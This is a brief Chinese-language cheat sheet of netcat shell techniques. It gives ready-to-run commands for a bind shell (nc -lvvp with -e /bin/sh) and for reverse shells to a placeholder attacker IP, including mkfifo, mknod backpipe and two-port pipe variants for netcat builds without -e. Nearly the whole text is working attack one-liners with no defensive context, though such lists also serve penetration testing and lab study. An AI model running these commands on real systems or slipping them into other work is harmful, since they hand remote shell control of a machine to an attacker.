反弹姿势
1、NC正向反弹
靶机:
nc -lvvp 靶机端口 -e /bin/sh
攻击机:
nc 靶机ip 靶机端口
2、NC反向反弹
(1)、可使用-e参数:
靶机:
nc x.x.x.x 8888 -e /bin/bash
攻击机:
nc -lvvp 8888
(2)、NC,无-e参数反弹shell
有些版本的NC可能不支持-e选项,不能使用-e,则:
方法一:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc x.x.x.x 8888 >/tmp/f
方法二:
mknod backpipe p; nc x.x.x.x 8888 0<backpipe | /bin/bash 1>backpipe 2>backpipe
方法三:利用管道符直接反弹:
攻击者主机上打开两个终端分别执行监听:
nc -nvlp 6666
nc -nvlp 7777
靶机上执行连接:
nc x.x.x.x 6666|/bin/bash|x.x.x.x 7777
监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip,反弹shell成功后,在监听6666端口的终端中执行命令可以在另一个终端中看到命令执行结果。